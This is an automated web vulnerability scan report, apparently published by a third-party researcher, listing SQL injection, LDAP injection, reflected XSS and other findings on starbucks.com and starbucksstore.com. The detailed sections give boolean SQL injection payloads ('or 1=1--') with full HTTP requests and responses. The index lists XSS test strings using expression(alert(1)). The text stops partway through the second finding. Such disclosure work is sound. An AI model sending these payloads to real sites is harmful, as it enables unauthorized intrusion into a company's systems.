Report generated by XSS.CX at Wed Nov 17 06:58:46 CST 2010.


Cross Site Scripting Reports | Hoyt LLC Research


1. SQL injection

1.1. http://www.starbucks.com/coffee/starbucks-reserve-coffee [name of an arbitrarily supplied request parameter]

1.2. http://www.starbucks.com/coffee/via/instant-coffee [name of an arbitrarily supplied request parameter]

1.3. http://www.starbucks.com/menu [name of an arbitrarily supplied request parameter]

1.4. http://www.starbucks.com/responsibility [__utmc cookie]

1.5. http://www.starbucks.com/responsibility/community/starbucks-foundation [__utmc cookie]

1.6. http://www.starbucksstore.com/aff/adredir.asp [SITESERVER cookie]

1.7. http://www.starbucksstore.com/guestassist/shcontus.asp [ASPSESSIONIDACABBACA cookie]

2. LDAP injection

2.1. http://www.starbucksstore.com/ [ASPSESSIONIDACABBACA cookie]

2.2. http://www.starbucksstore.com/aff/adredir.asp [ASPSESSIONIDACABBACA cookie]

2.3. http://www.starbucksstore.com/coffee-machines/ [ASPSESSIONIDCCDDADAA cookie]

2.4. http://www.starbucksstore.com/guestassist/shgaform.asp [EMail.x parameter]

3. Cross-site scripting (reflected)

3.1. http://www.starbucks.com/ [8af12"style%3d"x%3aexpression(alert(1))"9f35c014f5e parameter]

3.2. http://www.starbucks.com/ [8af12%22style%3d%22x%3aexpression(alert(1))%229f35c014f5e parameter]

3.3. http://www.starbucks.com/ [8af12%22style%3d%22x:expression(alert(1))%229f35c014f5e parameter]

3.4. http://www.starbucks.com/ [name of an arbitrarily supplied request parameter]

3.5. http://www.starbucks.com/about-us [name of an arbitrarily supplied request parameter]

3.6. http://www.starbucks.com/coffee [name of an arbitrarily supplied request parameter]

3.7. http://www.starbucks.com/coffee/learn [name of an arbitrarily supplied request parameter]

3.8. http://www.starbucks.com/coffee/learn/clover [name of an arbitrarily supplied request parameter]

3.9. http://www.starbucks.com/coffee/learn/flavors-in-your-cup [name of an arbitrarily supplied request parameter]

3.10. http://www.starbucks.com/coffee/starbucks-natural-fusions [name of an arbitrarily supplied request parameter]

3.11. http://www.starbucks.com/coffee/starbucks-natural-fusions/caramel [name of an arbitrarily supplied request parameter]

3.12. http://www.starbucks.com/coffee/starbucks-natural-fusions/cinnamon [name of an arbitrarily supplied request parameter]

3.13. http://www.starbucks.com/coffee/starbucks-natural-fusions/savoring [name of an arbitrarily supplied request parameter]

3.14. http://www.starbucks.com/coffee/starbucks-natural-fusions/vanilla [name of an arbitrarily supplied request parameter]

3.15. http://www.starbucks.com/coffee/starbucks-reserve-coffee [name of an arbitrarily supplied request parameter]

3.16. http://www.starbucks.com/coffee/starbucks-reserve-coffee/aged-sulawesi-kalosi [name of an arbitrarily supplied request parameter]

3.17. http://www.starbucks.com/coffee/starbucks-reserve-coffee/brazil-sul-de-minas-peaberry [name of an arbitrarily supplied request parameter]

3.18. http://www.starbucks.com/coffee/starbucks-reserve-coffee/el-salvador-montecarlos-estate-pacamara [name of an arbitrarily supplied request parameter]

3.19. http://www.starbucks.com/coffee/starbucks-reserve-coffee/nicaragua-corcasan [name of an arbitrarily supplied request parameter]

3.20. http://www.starbucks.com/coffee/via [name of an arbitrarily supplied request parameter]

3.21. http://www.starbucks.com/coffee/via/flavored-coffee [name of an arbitrarily supplied request parameter]

3.22. http://www.starbucks.com/coffee/via/instant-coffee [name of an arbitrarily supplied request parameter]

3.23. http://www.starbucks.com/coffee/whole-bean-coffee [name of an arbitrarily supplied request parameter]

3.24. http://www.starbucks.com/coffee/whole-bean-coffee/africa-arabia [name of an arbitrarily supplied request parameter]

3.25. http://www.starbucks.com/coffee/whole-bean-coffee/asia-pacific [name of an arbitrarily supplied request parameter]

3.26. http://www.starbucks.com/coffee/whole-bean-coffee/dark-and-specialty-roast [name of an arbitrarily supplied request parameter]

3.27. http://www.starbucks.com/coffee/whole-bean-coffee/latin-america [name of an arbitrarily supplied request parameter]

3.28. http://www.starbucks.com/coffee/whole-bean-coffee/multi-region-blends [name of an arbitrarily supplied request parameter]

3.29. http://www.starbucks.com/coffee/whole-bean-coffee/multi-region-blends/starbucks-christmas-blend [name of an arbitrarily supplied request parameter]

3.30. http://www.starbucks.com/coffeehouse [name of an arbitrarily supplied request parameter]

3.31. http://www.starbucks.com/coffeehouse/community [name of an arbitrarily supplied request parameter]

3.32. http://www.starbucks.com/coffeehouse/community/mystarbucksidea [name of an arbitrarily supplied request parameter]

3.33. http://www.starbucks.com/coffeehouse/entertainment [name of an arbitrarily supplied request parameter]

3.34. http://www.starbucks.com/coffeehouse/mobile-apps [name of an arbitrarily supplied request parameter]

3.35. http://www.starbucks.com/coffeehouse/mobile-apps/mystarbucks [name of an arbitrarily supplied request parameter]

3.36. http://www.starbucks.com/coffeehouse/mobile-apps/starbucks-card-mobile [name of an arbitrarily supplied request parameter]

3.37. http://www.starbucks.com/coffeehouse/mobile-apps/starbucks-card-mobile-bb [name of an arbitrarily supplied request parameter]

3.38. http://www.starbucks.com/coffeehouse/store-design [name of an arbitrarily supplied request parameter]

3.39. http://www.starbucks.com/coffeehouse/wireless-internet [name of an arbitrarily supplied request parameter]

3.40. http://www.starbucks.com/coffeehouse/wireless-internet/in-canada [name of an arbitrarily supplied request parameter]

3.41. http://www.starbucks.com/coffeehouse/wireless-internet/starbucks-digital-network [name of an arbitrarily supplied request parameter]

3.42. http://www.starbucks.com/customer-service/contact [name of an arbitrarily supplied request parameter]

3.43. http://www.starbucks.com/customer-service/faqs/card [name of an arbitrarily supplied request parameter]

3.44. http://www.starbucks.com/customer-service/faqs/coffee [name of an arbitrarily supplied request parameter]

3.45. http://www.starbucks.com/customer-service/faqs/coffeehouse [name of an arbitrarily supplied request parameter]

3.46. http://www.starbucks.com/customer-service/faqs/menu [name of an arbitrarily supplied request parameter]

3.47. http://www.starbucks.com/customer-service/faqs/responsibility [name of an arbitrarily supplied request parameter]

3.48. http://www.starbucks.com/customer-service/faqs/shop [name of an arbitrarily supplied request parameter]

3.49. http://www.starbucks.com/menu [name of an arbitrarily supplied request parameter]

3.50. http://www.starbucks.com/menu/drinks [name of an arbitrarily supplied request parameter]

3.51. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages [name of an arbitrarily supplied request parameter]

3.52. http://www.starbucks.com/menu/food [name of an arbitrarily supplied request parameter]

3.53. http://www.starbucks.com/menu/food/bakery/cranberry-bliss-bar [name of an arbitrarily supplied request parameter]

3.54. http://www.starbucks.com/menu/nutrition [name of an arbitrarily supplied request parameter]

3.55. http://www.starbucks.com/menu/nutrition/20-under-200 [name of an arbitrarily supplied request parameter]

3.56. http://www.starbucks.com/menu/nutrition/20-under-200 [name of an arbitrarily supplied request parameter]

3.57. http://www.starbucks.com/menu/nutrition/35-under-350 [name of an arbitrarily supplied request parameter]

3.58. http://www.starbucks.com/responsibility [name of an arbitrarily supplied request parameter]

3.59. http://www.starbucks.com/responsibility/community [name of an arbitrarily supplied request parameter]

3.60. http://www.starbucks.com/responsibility/community/community-service [name of an arbitrarily supplied request parameter]

3.61. http://www.starbucks.com/responsibility/community/starbucks-foundation [name of an arbitrarily supplied request parameter]

3.62. http://www.starbucks.com/responsibility/community/starbucks-red [name of an arbitrarily supplied request parameter]

3.63. http://www.starbucks.com/responsibility/community/youth-action [name of an arbitrarily supplied request parameter]

3.64. http://www.starbucks.com/search [61fd7"style%3d"x%3aexpression(alert(1))"61073b145fc parameter]

3.65. http://www.starbucks.com/search [keywords parameter]

3.66. http://www.starbucks.com/search [name of an arbitrarily supplied request parameter]

3.67. http://www.starbucks.com/site-map [name of an arbitrarily supplied request parameter]

3.68. http://www.starbucks.com/store-locator [name of an arbitrarily supplied request parameter]

3.69. http://www.starbucks.com/whats-new [name of an arbitrarily supplied request parameter]

3.70. http://www.starbucksstore.com/ [CookingAd cookie]

3.71. http://www.starbucksstore.com/GuestAssist/poweredbycooking.asp [CookingAd cookie]

3.72. http://www.starbucksstore.com/StarbucksCard/default.asp [CookingAd cookie]

3.73. http://www.starbucksstore.com/Tours/ [CookingAd cookie]

3.74. http://www.starbucksstore.com/aff/adredir.asp [CookingAd cookie]

3.75. http://www.starbucksstore.com/coffee [CookingAd cookie]

3.76. http://www.starbucksstore.com/coffee-machines [CookingAd cookie]

3.77. http://www.starbucksstore.com/coffee-machines/ [CookingAd cookie]

3.78. http://www.starbucksstore.com/default.asp [CookingAd cookie]

3.79. http://www.starbucksstore.com/entertainment [CookingAd cookie]

3.80. http://www.starbucksstore.com/entertainment/ [CookingAd cookie]

3.81. http://www.starbucksstore.com/extras/newsletters.asp [CookingAd cookie]

3.82. http://www.starbucksstore.com/guestassist/ga_faq_shipop.asp [CookingAd cookie]

3.83. http://www.starbucksstore.com/guestassist/gareturns.asp [CookingAd cookie]

3.84. http://www.starbucksstore.com/guestassist/shcontus.asp [CookingAd cookie]

3.85. http://www.starbucksstore.com/guestassist/shgaemailconfirm.asp [CookingAd cookie]

3.86. http://www.starbucksstore.com/guestassist/shgaform.asp [CookingAd cookie]

3.87. http://www.starbucksstore.com/mya/links.asp [CookingAd cookie]

3.88. http://www.starbucksstore.com/mya/track.asp [CookingAd cookie]

3.89. http://www.starbucksstore.com/products/include/SearchNav.asp [CookingAd cookie]

3.90. http://www.starbucksstore.com/products/shabotus.asp [CookingAd cookie]

3.91. http://www.starbucksstore.com/products/shourplg.asp [CookingAd cookie]

3.92. http://www.starbucksstore.com/products/shprodde.asp [CookingAd cookie]

3.93. http://www.starbucksstore.com/products/shprodde.asp [CookingAd cookie]

3.94. http://www.starbucksstore.com/products/shprodli.asp [CookingAd cookie]

3.95. http://www.starbucksstore.com/products/sitemap.asp [CookingAd cookie]

3.96. http://www.starbucksstore.com/products/terms.asp [CookingAd cookie]

3.97. http://www.starbucksstore.com/small-office-coffee [CookingAd cookie]

3.98. http://www.starbucksstore.com/starbucks-coffee-delivery [CookingAd cookie]

3.99. http://www.starbucksstore.com/starbucks-coffee-delivery/ [CookingAd cookie]

3.100. http://www.starbucksstore.com/starbucks-coffee-tours/ [CookingAd cookie]

3.101. http://www.starbucksstore.com/starbucks-gift-cards [CookingAd cookie]

3.102. http://www.starbucksstore.com/starbucks-gifts [CookingAd cookie]

3.103. http://www.starbucksstore.com/starbucks-gifts/ [CookingAd cookie]

3.104. http://www.starbucksstore.com/starbucks-reserve [CookingAd cookie]

3.105. http://www.starbucksstore.com/starbucks-seasonal [CookingAd cookie]

3.106. http://www.starbucksstore.com/starbucks-seasonal/starbucks-seasonal.asp [CookingAd cookie]

3.107. http://www.starbucksstore.com/starbucks-via [CookingAd cookie]

3.108. http://www.starbucksstore.com/tea [CookingAd cookie]

4. Session token in URL

4.1. http://www.starbucks.com/about-us

4.2. http://www.starbucks.com/site-map

5. Open redirection

6. Cookie without HttpOnly flag set

6.1. http://www.starbucksstore.com/

6.2. http://www.starbucksstore.com/GuestAssist/poweredbycooking.asp

6.3. http://www.starbucksstore.com/aff/adredir.asp

6.4. http://www.starbucksstore.com/aff/adredir.asp

6.5. http://www.starbucksstore.com/guestassist/shcontus.asp

6.6. http://www.starbucksstore.com/guestassist/shcontus.asp

6.7. http://www.starbucksstore.com/guestassist/shgaemailconfirm.asp

6.8. http://www.starbucksstore.com/guestassist/shgaform.asp

6.9. http://www.starbucksstore.com/guestassist/shgaform.asp

6.10. http://www.starbucksstore.com/coffee-machines/

6.11. http://www.starbucksstore.com/default.asp

7. Password field with autocomplete enabled

7.1. http://www.starbucks.com/blog/610/check-in-at-starbucks

7.2. http://www.starbucks.com/blog/611/my-starbucks-idea-s-100-000th-idea

7.3. http://www.starbucks.com/blog/612/good-books-on-the-starbucks-digital-network

7.4. http://www.starbucks.com/blog/615/i-m-dreaming-of-cranberry-bliss-bar

7.5. http://www.starbucks.com/blog/616/thanksgiving-blend-fit-for-a-feast

8. Source code disclosure

9. Cross-domain Referer leakage

9.1. http://www.starbucks.com/

9.2. http://www.starbucks.com/

9.3. http://www.starbucks.com/

9.4. http://www.starbucks.com/search

9.5. http://www.starbucks.com/search

9.6. http://www.starbucks.com/search

9.7. http://www.starbucksstore.com/

9.8. http://www.starbucksstore.com/coffee-machines/

9.9. http://www.starbucksstore.com/default.asp

9.10. http://www.starbucksstore.com/guestassist/shcontus.asp

9.11. http://www.starbucksstore.com/products/shprodde.asp

9.12. http://www.starbucksstore.com/products/shprodli.asp

10. Cross-domain script include

10.1. http://www.starbucks.com/

10.2. http://www.starbucks.com/about-us

10.3. http://www.starbucks.com/blog/610/check-in-at-starbucks

10.4. http://www.starbucks.com/blog/611/my-starbucks-idea-s-100-000th-idea

10.5. http://www.starbucks.com/blog/612/good-books-on-the-starbucks-digital-network

10.6. http://www.starbucks.com/blog/615/i-m-dreaming-of-cranberry-bliss-bar

10.7. http://www.starbucks.com/blog/616/thanksgiving-blend-fit-for-a-feast

10.8. http://www.starbucks.com/coffee

10.9. http://www.starbucks.com/coffee/learn

10.10. http://www.starbucks.com/coffee/learn/clover

10.11. http://www.starbucks.com/coffee/learn/flavors-in-your-cup

10.12. http://www.starbucks.com/coffee/starbucks-natural-fusions

10.13. http://www.starbucks.com/coffee/starbucks-natural-fusions/caramel

10.14. http://www.starbucks.com/coffee/starbucks-natural-fusions/cinnamon

10.15. http://www.starbucks.com/coffee/starbucks-natural-fusions/savoring

10.16. http://www.starbucks.com/coffee/starbucks-natural-fusions/vanilla

10.17. http://www.starbucks.com/coffee/starbucks-reserve-coffee

10.18. http://www.starbucks.com/coffee/starbucks-reserve-coffee/aged-sulawesi-kalosi

10.19. http://www.starbucks.com/coffee/starbucks-reserve-coffee/brazil-sul-de-minas-peaberry

10.20. http://www.starbucks.com/coffee/starbucks-reserve-coffee/el-salvador-montecarlos-estate-pacamara

10.21. http://www.starbucks.com/coffee/starbucks-reserve-coffee/nicaragua-corcasan

10.22. http://www.starbucks.com/coffee/via

10.23. http://www.starbucks.com/coffee/via/flavored-coffee

10.24. http://www.starbucks.com/coffee/via/instant-coffee

10.25. http://www.starbucks.com/coffee/whole-bean-coffee

10.26. http://www.starbucks.com/coffee/whole-bean-coffee/africa-arabia

10.27. http://www.starbucks.com/coffee/whole-bean-coffee/dark-and-specialty-roast

10.28. http://www.starbucks.com/coffee/whole-bean-coffee/latin-america

10.29. http://www.starbucks.com/coffee/whole-bean-coffee/multi-region-blends

10.30. http://www.starbucks.com/coffee/whole-bean-coffee/multi-region-blends/starbucks-christmas-blend

10.31. http://www.starbucks.com/coffeehouse

10.32. http://www.starbucks.com/coffeehouse/community

10.33. http://www.starbucks.com/coffeehouse/community/mystarbucksidea

10.34. http://www.starbucks.com/coffeehouse/entertainment

10.35. http://www.starbucks.com/coffeehouse/mobile-apps

10.36. http://www.starbucks.com/coffeehouse/mobile-apps/mystarbucks

10.37. http://www.starbucks.com/coffeehouse/mobile-apps/starbucks-card-mobile

10.38. http://www.starbucks.com/coffeehouse/mobile-apps/starbucks-card-mobile-bb

10.39. http://www.starbucks.com/coffeehouse/wireless-internet

10.40. http://www.starbucks.com/coffeehouse/wireless-internet/in-canada

10.41. http://www.starbucks.com/coffeehouse/wireless-internet/starbucks-digital-network

10.42. http://www.starbucks.com/customer-service/contact

10.43. http://www.starbucks.com/customer-service/faqs/coffee

10.44. http://www.starbucks.com/customer-service/faqs/coffeehouse

10.45. http://www.starbucks.com/customer-service/faqs/menu

10.46. http://www.starbucks.com/customer-service/faqs/responsibility

10.47. http://www.starbucks.com/customer-service/faqs/shop

10.48. http://www.starbucks.com/menu

10.49. http://www.starbucks.com/menu/drinks

10.50. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages

10.51. http://www.starbucks.com/menu/food

10.52. http://www.starbucks.com/menu/food/bakery/cranberry-bliss-bar

10.53. http://www.starbucks.com/menu/nutrition

10.54. http://www.starbucks.com/menu/nutrition/20-under-200

10.55. http://www.starbucks.com/menu/nutrition/35-under-350

10.56. http://www.starbucks.com/responsibility

10.57. http://www.starbucks.com/responsibility/community

10.58. http://www.starbucks.com/responsibility/community/community-service

10.59. http://www.starbucks.com/responsibility/community/starbucks-foundation

10.60. http://www.starbucks.com/responsibility/community/starbucks-red

10.61. http://www.starbucks.com/responsibility/community/youth-action

10.62. http://www.starbucks.com/search

10.63. http://www.starbucks.com/share

10.64. http://www.starbucks.com/share/

10.65. http://www.starbucks.com/site-map

10.66. http://www.starbucks.com/store-locator

10.67. http://www.starbucks.com/whats-new

10.68. http://www.starbucksstore.com/

10.69. http://www.starbucksstore.com/GuestAssist/poweredbycooking.asp

10.70. http://www.starbucksstore.com/StarbucksCard/default.asp

10.71. http://www.starbucksstore.com/coffee-machines/

10.72. http://www.starbucksstore.com/default.asp

10.73. http://www.starbucksstore.com/entertainment/

10.74. http://www.starbucksstore.com/extras/newsletters.asp

10.75. http://www.starbucksstore.com/guestassist/ga_faq_shipop.asp

10.76. http://www.starbucksstore.com/guestassist/gareturns.asp

10.77. http://www.starbucksstore.com/guestassist/shcontus.asp

10.78. http://www.starbucksstore.com/guestassist/shgaemailconfirm.asp

10.79. http://www.starbucksstore.com/guestassist/shgaform.asp

10.80. http://www.starbucksstore.com/mya/links.asp

10.81. http://www.starbucksstore.com/mya/track.asp

10.82. http://www.starbucksstore.com/products/shabotus.asp

10.83. http://www.starbucksstore.com/products/shourplg.asp

10.84. http://www.starbucksstore.com/products/shprodde.asp

10.85. http://www.starbucksstore.com/products/shprodli.asp

10.86. http://www.starbucksstore.com/products/sitemap.asp

10.87. http://www.starbucksstore.com/products/terms.asp

10.88. http://www.starbucksstore.com/starbucks-coffee-delivery/

10.89. http://www.starbucksstore.com/starbucks-coffee-tours/

10.90. http://www.starbucksstore.com/starbucks-gifts/

10.91. http://www.starbucksstore.com/starbucks-seasonal/starbucks-seasonal.asp

11. Email addresses disclosed

11.1. http://www.starbucks.com/customer-service/faqs/coffeehouse

11.2. http://www.starbucks.com/customer-service/faqs/shop

11.3. http://www.starbucks.com/static/js/global.js

11.4. http://www.starbucksstore.com/guestassist/guestassist_jscript.js

12. Private IP addresses disclosed

12.1. http://www.starbucksstore.com/

12.2. http://www.starbucksstore.com/GuestAssist/poweredbycooking.asp

12.3. http://www.starbucksstore.com/GuestAssist/poweredbycooking.asp

12.4. http://www.starbucksstore.com/StarbucksCard/default.asp

12.5. http://www.starbucksstore.com/coffee-machines/

12.6. http://www.starbucksstore.com/default.asp

12.7. http://www.starbucksstore.com/entertainment/

12.8. http://www.starbucksstore.com/extras/newsletters.asp

12.9. http://www.starbucksstore.com/guestassist/ga_faq_shipop.asp

12.10. http://www.starbucksstore.com/guestassist/gareturns.asp

12.11. http://www.starbucksstore.com/guestassist/shcontus.asp

12.12. http://www.starbucksstore.com/guestassist/shcontus.asp

12.13. http://www.starbucksstore.com/guestassist/shcontus.asp

12.14. http://www.starbucksstore.com/guestassist/shgaemailconfirm.asp

12.15. http://www.starbucksstore.com/guestassist/shgaform.asp

12.16. http://www.starbucksstore.com/mya/links.asp

12.17. http://www.starbucksstore.com/mya/track.asp

12.18. http://www.starbucksstore.com/products/shabotus.asp

12.19. http://www.starbucksstore.com/products/shourplg.asp

12.20. http://www.starbucksstore.com/products/shprodde.asp

12.21. http://www.starbucksstore.com/products/shprodli.asp

12.22. http://www.starbucksstore.com/products/sitemap.asp

12.23. http://www.starbucksstore.com/products/terms.asp

12.24. http://www.starbucksstore.com/starbucks-coffee-delivery/

12.25. http://www.starbucksstore.com/starbucks-coffee-tours/

12.26. http://www.starbucksstore.com/starbucks-gifts/

12.27. http://www.starbucksstore.com/starbucks-seasonal/starbucks-seasonal.asp

13. HTML does not specify charset

14. Content type incorrectly stated



1. SQL injection
There are 7 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and to avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://www.starbucks.com/coffee/starbucks-reserve-coffee [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.starbucks.com
Path:   /coffee/starbucks-reserve-coffee

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 62476475'%20or%201%3d1--%20 and 62476475'%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /coffee/starbucks-reserve-coffee?162476475'%20or%201%3d1--%20=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response 1

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:57:35 GMT
Connection: close
Content-Length: 52660

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<a href="/coffee/starbucks-reserve-coffee/aged-sulawesi-kalosi" title="Aged Sulawesi Kalosi">
                   <img src="http://assets.starbucks.com/assets/aa98bb468e8e4d11bcf9c7c5c337e4fd.jpg" alt="Aged Sulawesi Kalosi Stamp Art" />
                   <br /><strong><span>Aged Sulawesi Kalosi</span></strong>
                   <br /><span class="family">Starbucks Reserve... Coffee </span>
                   <br /><span class="intensity"></span>
               </a>
           </li>
           
           <li class="specialty_roast">
               <a href="/coffee/starbucks-reserve-coffee/brazil-sul-de-minas-peaberry" title="Brazil Sul de Minas Peaberry">
                   <img src="http://assets.starbucks.com/assets/84a1915283354bf5af4293a62a6b3175.jpg" alt="Brazil Sul de Minas Peaberry Stamp Art" />
                   <br /><strong><span>Brazil Sul de Minas Peaberry</span></strong>
                   <br /><span class="family">Starbucks Reserve... Coffee </span>
                   <br /><span class="intensity"></span>
               </a>
           </li>
           
           <li class="specialty_roast">
               <a href="/coffee/starbucks-reserve-coffee/nicaragua-corcasan" title="Nicaragua Corcasan">
                   <img src="http://assets.starbucks.com/assets/a96b1ae27bf54ad18badf356775bc1d0.jpg" alt="Nicaragua Corcasan Stamp Art" />
                   <br /><strong><span>Nicaragua Corcasan</span></strong>
                   <br /><span class="family">Starbucks Reserve... Coffee </span>
                   <br /><span class="intensity"></span>
               </a>
           </li>
           
           <li class="specialty_roast">
               <a href="/coffee/starbucks-reserve-coffee/el-salvador-montecarlos-estate-pacamara" title="El Salvador Montecarlos Estate Pacamara">
                   <img src="http://assets.starbucks.com/assets/6099ccd747624971ba8c782bb0f8fe45.jpg" alt="El Salvador Pacamara Montecarlos Estate Catalog Image" />
                   <br /><strong><span>El Salvador Montecarlos Estate Pacamara</span></strong>
                   <br /><span class="family">Starbucks Reserve... Coffee </span>
                   <br /><span class="intensity"></span>
               </a>
           </li>
           
           <li class="specialty_roast">
               <a href="/coffee/starbucks-reserve-coffee/galapagos
...[SNIP]...

Request 2

GET /coffee/starbucks-reserve-coffee?162476475'%20or%201%3d2--%20=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response 2

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:57:38 GMT
Connection: close
Content-Length: 51704

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<a href="/coffee/starbucks-reserve-coffee/nicaragua-corcasan" title="Nicaragua Corcasan">
                   <img src="http://assets.starbucks.com/assets/a96b1ae27bf54ad18badf356775bc1d0.jpg" alt="Nicaragua Corcasan Stamp Art" />
                   <br /><strong><span>Nicaragua Corcasan</span></strong>
                   <br /><span class="family">Starbucks Reserve... Coffee </span>
                   <br /><span class="intensity"></span>
               </a>
           </li>
           
           <li class="specialty_roast">
               <a href="/coffee/starbucks-reserve-coffee/el-salvador-montecarlos-estate-pacamara" title="El Salvador Montecarlos Estate Pacamara">
                   <img src="http://assets.starbucks.com/assets/6099ccd747624971ba8c782bb0f8fe45.jpg" alt="El Salvador Pacamara Montecarlos Estate Catalog Image" />
                   <br /><strong><span>El Salvador Montecarlos Estate Pacamara</span></strong>
                   <br /><span class="family">Starbucks Reserve... Coffee </span>
                   <br /><span class="intensity"></span>
               </a>
           </li>
           
           <li class="specialty_roast">
               <a href="/coffee/starbucks-reserve-coffee/galapagos-san-cristobal" title="Gal..pagos San Crist..bal">
                   <img src="http://assets.starbucks.com/assets/4d25963349584f26a7d3f9ac787313e9.jpg" alt="Galapagos San Cristobal" />
                   <br /><strong><span>Gal..pagos San Crist..bal</span></strong>
                   <br /><span class="family">Starbucks Reserve... Coffee </span>
                   <br /><span class="intensity"></span>
               </a>
           </li>
           
       </ol>
   </div>


   <div class="section" id="posts">


<div id="blog-603" class="blog-entry">
<h2><a href="/blog/The-New-Starbucks-Reservee284a2-Coffees">The New Starbucks Reserve... Coffees</a></h2>
<ul class="heading">
<li class="byline">
           <p class="postdate">October 05, 2010</p>
<p>Posted by Jason S., coffee engagement manager</p>
</li>
<li class="comment-num"><a href="/blog/the-new-starbucks-reservee284a2-coffees#blog-comments"><span class="comment-count">0</span> Comments</a></li>
</ul>

...[SNIP]...

1.2. http://www.starbucks.com/coffee/via/instant-coffee [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.starbucks.com
Path:   /coffee/via/instant-coffee

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 13312046'%20or%201%3d1--%20 and 13312046'%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /coffee/via/instant-coffee?113312046'%20or%201%3d1--%20=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response 1

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:57:02 GMT
Connection: close
Content-Length: 53520

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<a href="/coffee/via/instant-coffee/christmas-blend" title="Christmas Blend">
                           <img src="http://assets.starbucks.com/assets/e9a91915e04244bf99f8a97ed289c558.jpg" alt="Starbucks VIA.. Christmas Blend" />
                           <br /><strong><span>Christmas Blend</span></strong>
                           <br /><span class="family">Starbucks VIA.. Coffees</span>
                           <br /><span class="intensity"></span>
                       </a>
                   </li>
                   
                   <li class="specialty_roast">
                       <a href="/coffee/via/instant-coffee/colombia" title="Colombia">
                           <img src="http://assets.starbucks.com/assets/b5deaf4ecf7d425e822f907973cb950f.png" alt="Starbucks VIA.. Colombia" />
                           <br /><strong><span>Colombia</span></strong>
                           <br /><span class="family">Starbucks VIA.. Coffees</span>
                           <br /><span class="intensity">Medium</span>
                       </a>
                   </li>
                   
                   <li class="specialty_roast">
